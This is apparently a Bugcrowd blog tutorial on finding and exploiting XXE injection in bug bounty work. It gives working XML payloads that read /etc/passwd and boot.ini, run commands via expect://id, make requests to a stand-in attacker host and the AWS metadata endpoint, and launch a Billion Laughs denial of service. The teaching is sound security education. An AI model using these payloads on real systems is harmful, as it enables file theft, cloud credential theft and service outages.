Introduction
Every time I see an opportunity to attempt an External Entity Injection (XXE) attack I get excited. In my experience it has a high chance of success when compared to many other vulnerability types. Many of the XXE exploitation methods require multiple steps, and are often not able to be detected by automated scanners. This makes it a great vulnerability class to try on more mature bug bounty programs. What’s even better is that XXE is often of critical severity, and can even result in remote code execution in some cases.
A while back, @bugcrowd tweeted about some methods for discovering and exploiting External Entity Injection (XXE) submissions. Twitter is not the ideal medium for relaying swathes of technical information, so this blog post aims to fill in the gaps!
What is XXE?
External Entity Injection (XXE) occurs when Extensible Markup Language (XML) is provided as user input and processed on the server in a way that parses external entities. It sounds more complicated than it is, so keep reading! XXE can often be exploited to read arbitrary local files, achieve Server-Side Request Forgery (SSRF), Denial of Service (DoS) and sometimes even Remote Code Execution (RCE).
To fully understand XXE, we must first understand XML. XML is quite an abstract concept but in essence, it is just a format for sending and receiving information. Below is an example of XML.
<car>
<color>Red</color>
<brand>Ferrari</brand>
<topspeed>340 km/h</topspeed>
</car>
And this is also an example of XML:
<blogs>
<blog>
<title>How to Find XXE Burgers</title>
<summary>XXE bugs are great, but have you tried XXE burgers?</summary>
<body>Don’t waste your time searching for bugs. Burgers are far more delicious.</body>
</blog>
<blog>
<title>10 Cat Pics That Will Make You Question Everything</title>
<summary>Some cats are cute, but these cats will literally make you quit your day job.</summary>
<body>Cats cats cats. More cats and cats.</body>
</blog>
</blogs>
Some important things to note about the above examples:
- There are no predefined tags (the bits inside < > characters). The XML standard allows naming tags anything you want. It is worth noting that XML tags are case-sensitive (Speed is different to speed), unlike HTML.
- The tags are self descriptive. It is plain to see that the first example is describing a car, and the second is describing a blog with two posts.
- It is hierarchical. For example, the “title” element is inside the “blog” element, which is inside the “blogs” element.
If you have read this far, you might be wondering why you would use XML over JSON. To explain the difference, let’s take a look at another XML example:
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY brand "Ferrari"> ]>
<vehicle>
<type>Car</type>
<brand>&brand;</brand>
</vehicle>
In this example, we use an “entity”. On the second line, we called the entity “brand”, and we assigned it the value “Ferrari”. Then, on line 5, you can see that we used the syntax &brand; which will be replaced by “Ferrari” when the XML is parsed. If you have done any programming, it would help to think of an XML entity as a variable.
In this case we’ve just replaced the entity with text which is quite harmless but there are other types of XML entities that are far more interesting. For example, see below:
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<vehicle>
<type>Car</type>
<brand>&test;</brand>
</vehicle>
As you might have guessed, this example sets the “test” entity to the contents of the /etc/passwd file, then we use &test; within the XML body to embed the contents of /etc/passwd into the <brand> element.
If a vulnerable application received this XML as user input to add a car into a database, the “brand” field would be populated with the contents of /etc/passwd, which may be reflected back into the application. In that case, a user of the web application could exploit this to ultimately read the contents of local files on the web server. When this occurs, the application is vulnerable to XXE.
Where to look for XXE?
In a nutshell, XXE should be tested whenever XML is parsed, which is probably more common than you think. Below is a list of ideas:
- XML APIs
- SOAP APIs
- Anywhere that a Microsoft office (docx/xlxs/pptx/etc.) file is parsed. These are just zip files filled with XML files.
- RSS feed parsers (RSS feeds are just XML)
- SAML Authentication
- HTML parsing (for example, converting HTML to a PDF)
- Functionality that parses sitemap.xml files
- Functionality that parses SVG files
Exploitation methods
Here are some more exploitation methods that may be possible with XXE. Most of these have been adapted from OWASP’s XXE guide which is another great resource for learning about XXE.
Arbitrary File Read on Windows
Here we use the boot.ini file, which is usually available on Windows systems. For a Linux example, see above.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<foo>&xxe;</foo>
Remote Code Execution
If we’re lucky, and a PHP expect module is loaded, we may be able to execute arbitrary commands. In this case we are running the id command.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>`&xxe;`</user>
<pass>`mypass`</pass>
</creds>
Server-Side Request Forgery via XXE
In this example instead of accessing a local file, we are accessing a HTTP address which can be great for testing blind XXE vulnerabilities. In order to do this, you can set up a web server and watch the logs as you exploit the vulnerability to see if you receive any HTTP requests. If you do, bingo!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>
If it isn’t a blind XXE, i.e. you can see the contents of the entity, you could use this for some very nefarious things including accessing the AWS metadata endpoint.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/" >]>
<foo>&xxe;</foo>
Billion Laughs Attack (DoS)
This is my personal favorite, not for impact, but for ingenuity and troll-factor. A word of warning – don’t attempt this on a production system (a production system being any live website where a customers users, or the customers staff would also be using the service).
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
First, we define an entity lol as “lol”. Then we define lol1 as lol x 10, which would end up being:
lollollollollollollollollollol
Then we define lol2 as lol1 x 10, which ends up being:
Lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol
Then we define lol3 as lol2 x 10, which ends up being:
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol
Then lol4 is 10 x lol3, and so on. The length of the string gets exponentially higher, until we reach one billion “lol”s. This amount of processing, and the sheer size of the string, causes a denial of service as the XML parser quickly exhausts the system’s resources.
More Payloads
Now that you know the basics of XXE exploitation, you will have a better understanding of more complex XXE vectors. For a great list of payloads and ideas for exploitation, check out Swissky’s “Payloads All The Things” repository here:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
Let’s Try It!
If you’re looking for somewhere to try out your XXE skills, check out our programs that have web assets by clicking here.
Stay in Touch
If you’d like to get more involved with the Bugcrowd community, you can join our Discord, follow us on Twitter, or check out our video content on YouTube including loads of technical content for bug bounty hunters.
If you’d like to see more from the author personally, follow hakluke on Twitter, YouTube, Instagram or check out his website.